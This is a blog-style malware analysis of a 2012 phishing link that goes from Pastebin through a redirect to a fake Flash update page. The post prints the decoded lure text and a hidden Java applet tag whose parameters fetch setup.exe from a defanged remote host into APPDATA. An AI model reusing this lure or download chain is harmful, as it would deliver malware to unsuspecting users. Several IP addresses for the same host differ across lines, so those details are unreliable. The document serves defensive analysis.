Journey of a Phishing Link
We come across so many links via social networking websites, and we unknowingly click many of these. The malicious links have catastrophic results and the system as well as yours privacy is either compromised or your data takes the hit. Here is one such analysis of a link dated 17.April.2012 that I came across via Twitter and LinkedIn.
NOTE: All links have been appended with ‘non-clickable’ suffix “hxxp://” to prevent mistaken clicks.
Someone posted this link (hxxp://pastebin.com/dRGHt7hy) on a tweet. On checking, it was a list of URLs (actually single URL pasted multiple times – a sign of desperation),
9954 credit card numbers
It states this link has 9954 credit card numbers. The first malicious hint is – Why not posting it directly rather than pasting the same link 4 times in an entry.
Next, this is too much of a luring target; so walk safe. So I opened the link in Malzilla (hxxp://malzilla.sourceforge.net/) a malware hunting tool. I disabled the auto-redirect. The link "hxxp://tinyurl.com/saw87hujnworeg" redirected to "hxxp://184.108.40.206/jdb/inf.php?id=0b740ebcc2abbc5512c4875a0f74965b" which opened as text fields with scripts. The file contained only a ‘doubtful’ script with some headings and titles.
Here is the only important script contained within the page. Let’s do the analysis.
This script if too complex to understand due to large variable names, so lets first change the variable names to shorter versions for better understanding. Here is the modified script with short variable names without changing the logic and working of it.
Now, it is easy to understand the logic and working of the script. First, let us decode the setTimeout and document.write fields. They look like Base64 Encoded so, let’s try to decode them. The encoded strings are,
Decoded strings are,
Adobe Flash must be updated to view this, please install the latest version!
- <applet width="0px" height="0px" code="SiteLoader.class"
<param name="wcZPN" value="hxxp://220.127.116.11/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b">
<param name="v8TOX" value="setup.exe">
<param name="Legym" value="www.dogscast.com">
<param name="MpBDG" value="APPDATA">
The first decoded string has been set to entice the victim to click installing the ‘latest version’ of flash via their malicious link. So, we can see it will again issue a GET request to the following links,
And parameters are,
- name="wcZPN" value="hxxp://18.104.22.168/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b"
- name="v8TOX" value="setup.exe"
- name="Legym" value="www.dogscast.com"
- name="MpBDG" value="APPDATA"
Let us know access these URLs.
First I accessed the adobe.php URL (hxxp://22.214.171.124/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b) via Malzilla and it downloaded a file "Adobe-Flash_WIN.exe" on my system. The size of this file is approx 1.16 Mb. This file when scanned via VirusTotal had the catch rate of 2/42 anti-malware products. Now, this is scary. I didn’t get a chance to do the run time analysis of this file, but yes will post it in the next blog.
- On accessing the second URL (hxxp://126.96.36.199/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar) it downloads a JAR file "0b740ebcc2abbc5512c4875a0f74965b.jar". This file when extracted results in the "META-INF" directory and "SiteLoader.class" file. The contents of META-INF includes,
- Now let’s analyze the third URL load.php (hxxp://188.8.131.52/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b) via Malzilla. When accessed, this link downloads a "setup.exe" file on the host. This file is the same as the previous file as per the SHA56 hash "cb3869fa81086e4f91a61663ccac100f5099ccf4564a971f955f1a61d37aecf5".
This is a brief analysis of a phishing link, which started via twitter as a PASTEBIN link, and made its way to reach your system through various files.